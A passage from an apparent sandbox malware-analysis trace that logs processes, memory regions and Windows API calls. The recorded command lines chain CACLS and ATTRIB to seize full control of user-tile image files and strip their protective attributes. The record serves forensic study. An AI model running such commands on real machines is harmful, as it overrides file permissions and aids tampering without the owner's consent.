Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27788 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27789 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27790 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27791 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 27792 start_va = 0x3c0000 end_va = 0x3c8fff entry_point = 0x3c0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27793 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27794 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27795 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" 
Region: id = 27796 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27797 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27798 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27799 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27800 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27801 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 27802 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 27803 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27804 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27805 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27806 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = 
"\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27807 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27808 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27809 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 595 os_tid = 0x9cc Thread: id = 596 os_tid = 0xab8 Process: id = "420" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d80" os_pid = "0x310" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "418" os_parent_pid = "0x878" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27810 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27811 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27812 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type 
= pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27813 start_va = 0x130000 end_va = 0x136fff entry_point = 0x130000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 27814 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 27815 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27816 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27817 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27818 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27819 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27820 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27821 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27822 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27823 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = 
"private_0x00000000002b0000" filename = "" Region: id = 27824 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 27825 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 27826 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27827 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27828 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27829 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27830 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27831 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27832 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: 
"c:\\windows\\system32\\user32.dll") Region: id = 27833 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27834 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27835 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27836 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27837 start_va = 0x190000 end_va = 0x257fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 27838 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27839 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 597 os_tid = 0x848 Process: id = "421" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0x9d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All 
Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27840 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27841 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27842 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27843 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 27844 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 27845 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27846 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27847 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27848 
start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27849 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27894 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27895 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27896 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27897 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 27898 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 27899 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 27900 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27901 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27902 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: 
"c:\\windows\\system32\\kernel32.dll") Region: id = 27903 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27904 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27905 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27906 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27907 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27908 start_va = 0x430000 end_va = 0x4f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 27909 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27910 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27911 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 27912 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000001d0000" filename = "" Region: id = 27913 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 27914 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 27915 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 27916 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 27917 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Region: id = 27919 start_va = 0x1380000 end_va = 0x164efff entry_point = 0x1380000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 598 os_tid = 0x888 [0190.837] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fa7c | out: lpSystemTimeAsFileTime=0x14fa7c*(dwLowDateTime=0xa6a682c0, dwHighDateTime=0x1d440a9)) [0190.837] GetCurrentProcessId () returned 0x9d4 [0190.837] GetCurrentThreadId () returned 0x888 [0190.837] GetTickCount () returned 0x36566 [0190.837] QueryPerformanceCounter (in: lpPerformanceCount=0x14fa74 | out: lpPerformanceCount=0x14fa74*=24762603046) returned 1 [0190.837] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0190.837] __set_app_type (_Type=0x1) [0190.837] __p__fmode () returned 0x76b331f4 [0190.837] __p__commode () returned 0x76b331fc [0190.838] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0190.838] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, 
_Env=0x4a9e423c) returned 0 [0190.838] GetCurrentThreadId () returned 0x888 [0190.838] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x888) returned 0x38 [0190.838] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0190.838] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0190.838] SetThreadUILanguage (LangId=0x0) returned 0x409 [0190.838] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0190.838] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fa0c | out: phkResult=0x14fa0c*=0x0) returned 0x2 [0190.838] VirtualQuery (in: lpAddress=0x14fa43, lpBuffer=0x14f9dc, dwLength=0x1c | out: lpBuffer=0x14f9dc*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0190.838] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f9dc, dwLength=0x1c | out: lpBuffer=0x14f9dc*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0190.838] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f9dc, dwLength=0x1c | out: lpBuffer=0x14f9dc*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0190.838] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14f9dc, dwLength=0x1c | out: lpBuffer=0x14f9dc*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0190.838] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f9dc, dwLength=0x1c | out: lpBuffer=0x14f9dc*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) 
returned 0x1c [0190.838] GetConsoleOutputCP () returned 0x1b5 [0190.838] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0190.839] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0190.839] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.839] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0190.839] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.839] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0190.839] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.839] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0190.839] _get_osfhandle (_FileHandle=0) returned 0x3 [0190.839] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0190.839] _get_osfhandle (_FileHandle=0) returned 0x3 [0190.839] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0190.839] GetEnvironmentStringsW () returned 0x340308* [0190.840] FreeEnvironmentStringsW (penv=0x340308) returned 1 [0190.840] GetEnvironmentStringsW () returned 0x340308* [0190.840] FreeEnvironmentStringsW (penv=0x340308) returned 1 [0190.840] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e97c | out: phkResult=0x14e97c*=0x40) returned 0x0 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x0, lpData=0x14e988*=0xb8, lpcbData=0x14e980*=0x1000) returned 0x2 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x4, lpData=0x14e988*=0x1, lpcbData=0x14e980*=0x4) returned 0x0 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, 
lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x0, lpData=0x14e988*=0x1, lpcbData=0x14e980*=0x1000) returned 0x2 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x4, lpData=0x14e988*=0x0, lpcbData=0x14e980*=0x4) returned 0x0 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x4, lpData=0x14e988*=0x40, lpcbData=0x14e980*=0x4) returned 0x0 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x4, lpData=0x14e988*=0x40, lpcbData=0x14e980*=0x4) returned 0x0 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x0, lpData=0x14e988*=0x40, lpcbData=0x14e980*=0x1000) returned 0x2 [0190.840] RegCloseKey (hKey=0x40) returned 0x0 [0190.840] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e97c | out: phkResult=0x14e97c*=0x40) returned 0x0 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x0, lpData=0x14e988*=0x40, lpcbData=0x14e980*=0x1000) returned 0x2 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x4, lpData=0x14e988*=0x1, lpcbData=0x14e980*=0x4) returned 0x0 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x0, 
lpData=0x14e988*=0x1, lpcbData=0x14e980*=0x1000) returned 0x2 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x4, lpData=0x14e988*=0x0, lpcbData=0x14e980*=0x4) returned 0x0 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x4, lpData=0x14e988*=0x9, lpcbData=0x14e980*=0x4) returned 0x0 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x4, lpData=0x14e988*=0x9, lpcbData=0x14e980*=0x4) returned 0x0 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x0, lpData=0x14e988*=0x9, lpcbData=0x14e980*=0x1000) returned 0x2 [0190.840] RegCloseKey (hKey=0x40) returned 0x0 [0190.840] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886399 [0190.840] srand (_Seed=0x5b886399) [0190.840] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\"" [0190.840] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\"" [0190.841] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0190.841] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x341a68, 
